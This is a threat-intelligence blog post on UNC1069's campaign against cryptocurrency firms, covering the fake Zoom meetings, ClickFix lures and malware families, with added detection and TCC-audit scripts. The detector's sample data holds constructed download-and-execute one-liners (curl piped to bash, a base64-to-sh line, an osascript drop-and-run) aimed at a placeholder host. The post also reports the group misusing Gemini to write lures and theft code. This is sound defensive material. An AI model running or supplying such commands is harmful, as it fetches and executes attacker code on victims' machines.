
North Korea-Linked UNC1069 Uses AI Lures to Attack Cryptocurrency Organizations

  • Feb 11
  • 2 min read

Key Findings


  • North Korea-linked threat actor UNC1069 has been observed targeting the cryptocurrency sector to steal sensitive data

  • The intrusion relied on a social engineering chain: a compromised Telegram account, a fake Zoom meeting, a ClickFix infection vector, and reported use of AI-generated video to convince victims they were on a live call

  • UNC1069 has a history of conducting social engineering campaigns for financial gain using fake meeting invites and posing as investors from reputable companies on Telegram

  • The group has used generative AI tools like Gemini to produce lure material and other messaging related to cryptocurrency as part of its social engineering campaigns

  • UNC1069 has also been observed attempting to misuse Gemini to develop code for stealing cryptocurrency, and using deepfake images and video lures that mimic individuals in the cryptocurrency industry


Background


UNC1069, also tracked as CryptoCore and MASAN, is assessed to have been active since at least April 2018 and has a history of targeting the financial sector, including the cryptocurrency industry, for financial gain. The threat actor is believed to be linked to North Korea.


Tactics, Techniques, and Procedures (TTPs)


1. Social Engineering via Telegram: UNC1069 approaches victims by impersonating venture capitalists or using compromised accounts of legitimate entrepreneurs and startup founders on Telegram.


2. Fake Zoom Meeting: The threat actor uses Calendly to schedule a 30-minute meeting with the victim. The meeting link does not go to Zoom; it redirects to an attacker-controlled site masquerading as Zoom.


3. ClickFix Infection Vector: When the victim joins the fake meeting, they are shown a page that resembles a live Zoom call. The "participants" are reportedly recordings: the webcam footage of earlier victims is captured and replayed so that later targets believe they are on a genuine live call. The victim is then told there is an audio problem and is instructed to download and run a ClickFix-style "troubleshooting" command. As with other ClickFix lures, the victim executes the command themselves, so no exploit is needed and browser download warnings never fire; this command is the actual infection step.


4. Malware Deployment: The ClickFix command leads to the delivery of malicious payloads, including:


  • WAVESHAPER: A malicious C++ executable designed to gather system information and distribute additional payloads.

  • HYPERCALL: A Go-based downloader used to serve follow-on payloads.

  • HIDDENCALL: A Golang-based backdoor that provides hands-on keyboard access to the compromised system and deploys a Swift-based data miner called DEEPBREATH.

  • SUGARLOADER: A C++ downloader used to deploy CHROMEPUSH.

  • SILENCELIFT: A minimalist C/C++ backdoor that sends system information to a command-and-control (C2) server.
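The ClickFix step in the chain above leaves a recognizable trace: an interactive shell, started from Terminal, that fetches something over HTTP and pipes it straight into an interpreter, decodes base64 into a shell, or runs `osascript -e 'do shell script ...'` that drops and executes a file under /tmp. The following is an added example (not code from the article or from the Mandiant/Google reporting it summarizes) of scoring process-creation events for those patterns. The event records, rule weights, threshold, and the command lines themselves are all constructed for illustration; the actual commands used by UNC1069 are not published on this page, so the rules describe the ClickFix pattern in general rather than this campaign's specific payload.

```python
import re

# Constructed sample process-creation events (not from the article). The fields
# mimic what an EDR records on macOS: parent image, image, command line.
SAMPLE_EVENTS = [
    {"parent": "Terminal", "image": "bash",
     "cmdline": "curl -fsSL https://example.invalid/fix_audio.sh | bash"},
    {"parent": "Terminal", "image": "sh",
     "cmdline": "echo Y3VybCBodHRwOi8vZXhhbXBsZS5pbnZhbGlkL3ggfCBzaA== | base64 -d | sh"},
    {"parent": "Terminal", "image": "osascript",
     "cmdline": "osascript -e 'do shell script \"curl -o /tmp/z http://example.invalid/z "
                "&& chmod +x /tmp/z && /tmp/z\"'"},
    {"parent": "Terminal", "image": "bash", "cmdline": "brew update"},        # benign
    {"parent": "launchd", "image": "zsh", "cmdline": "zsh -c 'ls -la'"},      # benign
]

# Each rule: (name, weight, regex over the command line). Weights are illustrative.
RULES = [
    # curl/wget with a URL somewhere on the line
    ("remote_fetch", 1, re.compile(r"\b(curl|wget)\b.*https?://", re.I)),
    # something piped directly into a shell or scripting interpreter
    ("pipe_to_interpreter", 2,
     re.compile(r"\|\s*(sudo\s+)?(bash|zsh|ksh|sh|python3?|perl|osascript)\b", re.I)),
    # base64 decoding on the command line (obfuscated one-liners)
    ("base64_decode", 2, re.compile(r"\bbase64\s+(-[dD]\b|--decode\b)")),
    # AppleScript used as a wrapper to run a shell command
    ("osascript_do_shell_script", 2, re.compile(r"osascript\s+-e\b.*do shell script", re.I)),
    # a dropped file under /tmp made executable
    ("tmp_exec", 1, re.compile(r"chmod\s+\+x\s+/(private/)?tmp/")),
]
# ClickFix needs the victim to paste into a terminal, so a Terminal parent adds weight.
INTERACTIVE_PARENTS = {"Terminal", "iTerm2"}
THRESHOLD = 3


def classify(event):
    """Return matched rule names, the summed weight, and whether it crosses THRESHOLD."""
    matched = [name for name, _, rx in RULES if rx.search(event["cmdline"])]
    score = sum(w for name, w, _ in RULES if name in matched)
    if event["parent"] in INTERACTIVE_PARENTS:
        matched.append("interactive_shell_parent")
        score += 1
    return {"rules": matched, "score": score, "suspicious": score >= THRESHOLD}


def scan(events):
    """Return (index, classification) for every event scored as suspicious."""
    results = []
    for i, event in enumerate(events):
        verdict = classify(event)
        if verdict["suspicious"]:
            results.append((i, verdict))
    return results


if __name__ == "__main__":
    for i, verdict in scan(SAMPLE_EVENTS):
        print(f"[{verdict['score']}] {SAMPLE_EVENTS[i]['cmdline']}")
        print("     rules:", ", ".join(verdict["rules"]))
```

The three constructed lure commands score 4, 5 and 5 and are reported; `brew update` from Terminal scores only 1 for the parent and is not. In production the same rules belong in the EDR's own query language over real process telemetry, and the threshold should be tuned against a baseline of the organisation's developers, who legitimately run `curl | bash` installers more often than most.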


Targeted Data and Capabilities


  • DEEPBREATH: Tampers with the macOS Transparency, Consent, and Control (TCC) database, which gates application access to protected user data, in order to harvest iCloud Keychain credentials and data from Google Chrome, Brave, Microsoft Edge, Telegram, and Apple Notes.

  • CHROMEPUSH: A data stealer deployed as a browser extension to Google Chrome and Brave browsers.
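Because DEEPBREATH is reported to tamper with the TCC database rather than exploit a bug, the defensive check is to audit that database for grants that nobody approved. The following is an added example (not the article's or the malware authors' code) that reads the per-user TCC.db read-only and flags allowed entries on sensitive services whose client is not on an allowlist or which carry no code-signing requirement. The table definition used here is a subset of the real `access` table, the sample rows are constructed, and the allowlist, the "sensitive" service set and the seven-day recency window are assumptions to be tuned per environment. On a real Mac the process running this needs Full Disk Access itself, because TCC protects its own database; otherwise the script falls back to the constructed sample.

```python
import sqlite3
import time
from pathlib import Path

# Per-user TCC database; the system-wide one is under /Library/Application Support/com.apple.TCC/.
TCC_USER_DB = Path.home() / "Library/Application Support/com.apple.TCC/TCC.db"

# Services whose grant gives an app broad reach into user data (assumed set, extend as needed).
SENSITIVE_SERVICES = {
    "kTCCServiceSystemPolicyAllFiles",        # Full Disk Access
    "kTCCServiceAccessibility",
    "kTCCServiceAppleEvents",                 # automation of other apps
    "kTCCServiceScreenCapture",
    "kTCCServiceSystemPolicyDesktopFolder",
    "kTCCServiceSystemPolicyDocumentsFolder",
}
AUTH_ALLOWED = 2   # auth_value: 0 denied, 1 unknown, 2 allowed, 3 limited

# Subset of the real access-table columns; used only to build the constructed sample DB.
ACCESS_DDL = """CREATE TABLE access (
    service TEXT NOT NULL, client TEXT NOT NULL, client_type INTEGER NOT NULL,
    auth_value INTEGER NOT NULL, auth_reason INTEGER NOT NULL,
    csreq BLOB, last_modified INTEGER NOT NULL)"""


def audit_tcc(conn, allowlist, now=None, recent_days=7):
    """Return findings for allowed grants on sensitive services that look unapproved."""
    now = int(time.time()) if now is None else now
    findings = []
    rows = conn.execute(
        "SELECT service, client, client_type, csreq, last_modified "
        "FROM access WHERE auth_value = ?", (AUTH_ALLOWED,))
    for service, client, client_type, csreq, last_modified in rows:
        if service not in SENSITIVE_SERVICES:
            continue
        reasons = []
        if client not in allowlist:
            reasons.append("client not on allowlist")
        if csreq is None:
            # Without a stored code-signing requirement the grant is keyed on the
            # identifier alone, so any binary claiming that identifier inherits it.
            reasons.append("no code-signing requirement stored")
        if not reasons:
            continue
        if now - last_modified < recent_days * 86400:
            reasons.append(f"granted within the last {recent_days} days")
        findings.append({"service": service, "client": client,
                         "client_type": client_type, "reasons": reasons})
    return findings


def build_sample_db(now):
    """Constructed sample TCC.db (not a real capture) so the audit runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute(ACCESS_DDL)
    rows = [
        # service, client, client_type (0 bundle id, 1 path), auth_value, auth_reason, csreq, last_modified
        ("kTCCServiceSystemPolicyAllFiles", "com.apple.Terminal", 0, 2, 2, b"\xfa\xde\x0c\x00", now - 90 * 86400),
        ("kTCCServiceSystemPolicyAllFiles", "/usr/local/bin/updater", 1, 2, 2, None, now - 3600),
        ("kTCCServiceAppleEvents", "com.example.backup", 0, 2, 2, b"\xfa\xde\x0c\x00", now - 30 * 86400),
        ("kTCCServiceCamera", "com.example.videoconf", 0, 2, 2, b"\xfa\xde\x0c\x00", now - 200 * 86400),
        ("kTCCServiceAccessibility", "com.example.helper", 0, 0, 2, None, now - 100),   # denied, ignored
    ]
    conn.executemany("INSERT INTO access VALUES (?,?,?,?,?,?,?)", rows)
    return conn


def open_readonly(path):
    """Open the real database without taking a write lock on it."""
    return sqlite3.connect(path.as_uri() + "?mode=ro", uri=True)


if __name__ == "__main__":
    now = int(time.time())
    allowlist = {"com.apple.Terminal", "com.example.backup"}   # hypothetical approved clients
    try:
        conn = open_readonly(TCC_USER_DB) if TCC_USER_DB.exists() else build_sample_db(now)
        findings = audit_tcc(conn, allowlist, now)
    except sqlite3.OperationalError as err:                    # typically: no Full Disk Access
        print(f"could not read {TCC_USER_DB} ({err}); using constructed sample")
        findings = audit_tcc(build_sample_db(now), allowlist, now)
    for f in findings:
        print(f"{f['service']:42} {f['client']:28} {'; '.join(f['reasons'])}")
```

On the constructed data only `/usr/local/bin/updater` is reported: it holds Full Disk Access, is not on the allowlist, has no stored code-signing requirement, and was granted an hour ago. The camera grant is skipped because the service is not in the sensitive set, and the denied Accessibility row is never considered. For fleet-wide use, feed the findings to the SIEM and compare against MDM-pushed PPPC profiles, which are the only legitimate source of silent grants.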


Mitigation Strategies


  • Educate employees on social engineering tactics, in particular that a meeting page which asks them to "fix" audio or video by running a command is a compromise attempt, never a support step. Unsolicited meeting invites and requests to download or run software should be treated as hostile until verified.

  • Implement robust endpoint protection and network monitoring solutions to detect and block the deployment of the identified malware families.

  • Regularly update and patch all software to mitigate known vulnerabilities that could be exploited by the threat actors.

  • Verify the identity of contacts who propose deals or meetings through a second, previously established channel (a known phone number or corporate e-mail), since in this campaign the initial contact came from a legitimate but compromised Telegram account; encryption alone does not protect against a hijacked account.


Sources


  • https://thehackernews.com/2026/02/north-korea-linked-unc1069-uses-ai.html

  • https://x.com/TheCyberSecHub/status/2021483142713049478

  • https://www.reddit.com/r/SecOpsDaily/comments/1r1rhfr/north_korealinked_unc1069_uses_ai_lures_to_attack/

© 2025 by Explain IT Again. Powered and secured by Wix